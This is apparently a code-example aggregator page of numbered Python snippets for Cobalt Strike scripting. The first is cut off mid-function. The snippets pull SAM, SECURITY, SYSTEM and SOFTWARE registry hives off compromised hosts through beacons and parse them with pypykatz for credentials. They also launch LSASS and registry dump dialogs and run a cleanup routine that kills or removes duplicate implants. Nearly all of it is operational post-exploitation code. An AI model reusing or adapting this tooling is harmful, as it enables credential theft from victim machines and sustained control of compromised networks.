    engine.message('sam_filepath %s' % sam_filepath)
    engine.message('security_filepath %s' % security_filepath)
    engine.message('software_filepath %s' % software_filepath)
    engine.message('chunksize %s' % chunksize)

    system_file = BaconFileReader(bid,
                                  system_filepath,
                                  boffilepath,
                                  chunksize=chunksize)
    sam_file = None
    if sam_filepath is not None and len(sam_filepath) > 0:
        sam_file = BaconFileReader(bid,
                                   sam_filepath,
                                   boffilepath,
                                   chunksize=chunksize)
    security_file = None
    if security_filepath is not None and len(security_filepath) > 0:
        security_file = BaconFileReader(bid,
                                        security_filepath,
                                        boffilepath,
                                        chunksize=chunksize)
    software_file = None
    if software_filepath is not None and len(software_filepath) > 0:
        software_file = BaconFileReader(bid,
                                        software_filepath,
                                        boffilepath,
                                        chunksize=chunksize)

    starttime = datetime.datetime.utcnow()
    po = OffineRegistry.from_files(system_file,
                                   sam_path=sam_file,
                                   security_path=security_file,
                                   software_path=software_file,
                                   notfile=True)
    endtime = datetime.datetime.utcnow()
    runtime = (endtime - starttime).total_seconds()
    engine.message('TOTAL RUNTIME: %ss' % runtime)

    engine.message(str(po))

    if 'text' in outputs:
        engine.message(str(po))
        aggressor.blog(bid, str(po))

    if 'json' in outputs:
        engine.message(po.to_json())
        aggressor.blog(bid, po.to_json())
Ejemplo n.º 26
0
def beacon_output_handler(bid, text, timestamp):
    try:
        engine.message(
            'beacon_output_handler invoked. This should never happen!!!')
    except Exception as e:
        engine.message('CB ERROR! %s ' % e)
Ejemplo n.º 27
0
def cleanup(hours=80, dry=True):
    # collect notes
    notes = collections.defaultdict(set)
    for beacon in aggressor.beacons():
        # skip 'killing'
        if beacon['note'] == 'killing':
            continue

        ident = '{}@{}'.format(beacon['user'], beacon['computer'])
        notes[ident].add(beacon['note'])

    # remove dead
    if not dry:
        prune_dead()
    else:
        engine.message('not pruning dead beacons')

    # remove old
    #if not dry:
    #    prune_old(int(hours))
    #else:
    #    engine.message('not pruning old beacons')

    # collect beacons
    by_ident = collections.defaultdict(list)
    for beacon in aggressor.beacons():
        # skip dead beacons
        if beacon['alive'] == 'false':
            continue

        ident = '{}@{}'.format(beacon['user'], beacon['computer'])
        by_ident[ident].append(beacon)

    # sort beacons by newest
    for ident, beacons in by_ident.items():
        beacons = sorted(beacons, key=lambda b: int(b['last']))
        by_ident[ident] = beacons

    # de-duplicate
    for ident, beacons in by_ident.items():
        if len(beacons) > 1:
            # pick a beacon. to choose a selected beacon we:
            #   - find all beacons with last times within 2 hours of the newest beacon
            #   - pick the newest beacon of those with a note
            #   - or: pick the newest beacon
            #newest_beacon = beacons[0]
            #for beacon in beacons[1:]:
            #    if last_difference(newest_beacon['last'], beacon['last']) > 1.0:
            #        if beacon['note']:
            #            # newest beacon with a note
            #            picked_beacon = beacon
            #            break
            #else:
            #    # newest beacon
            #    picked_beacon = beacons[0]

            picked_beacon = list(
                filter(lambda b: b['note'] != 'killing', beacons))[0]
            beacons.remove(picked_beacon)

            # kill or remove the other beacons
            for beacon in beacons:
                if {'keep', 'test'} & set(beacon['note'].split()):
                    # special note. don't kill
                    engine.message(
                        'not touching beaacon with keep note {} {}'.format(
                            ident, beacon['note']))
                elif last_difference(picked_beacon['last'],
                                     beacon['last']) > 2.0:
                    # probably dead. just remove
                    engine.message('removing older beacon {} {}'.format(
                        ident, beacon['id']))
                    if not dry:
                        aggressor.beacon_remove(beacon['id'])
                else:
                    # kill and remove
                    engine.message('killing older beacon {} {}'.format(
                        ident, beacon['id']))
                    if not dry:
                        suicide(beacon['id'])

            # pick shortest note
            picked_note = None
            for note in notes[ident]:
                if not picked_note or len(picked_note) > note:
                    picked_note = note

            if picked_note:
                engine.message('{} picked note: {}'.format(ident, picked_note))
                if not dry:
                    aggressor.bnote(picked_beacon['id'], picked_note)
Ejemplo n.º 28
0
def lsass_start_cb(bids):
    engine.message(len(bids))
    render_dialog_pypykatz_lsass(bids[0])
Ejemplo n.º 29
0
def registry_start_cb(bids):
    engine.message(len(bids))
    engine.message('registry parse cb called!')
    render_dialog_pypykatz_registry(bids[0])
Ejemplo n.º 30
0
def test_command():
    engine.message('test_command called')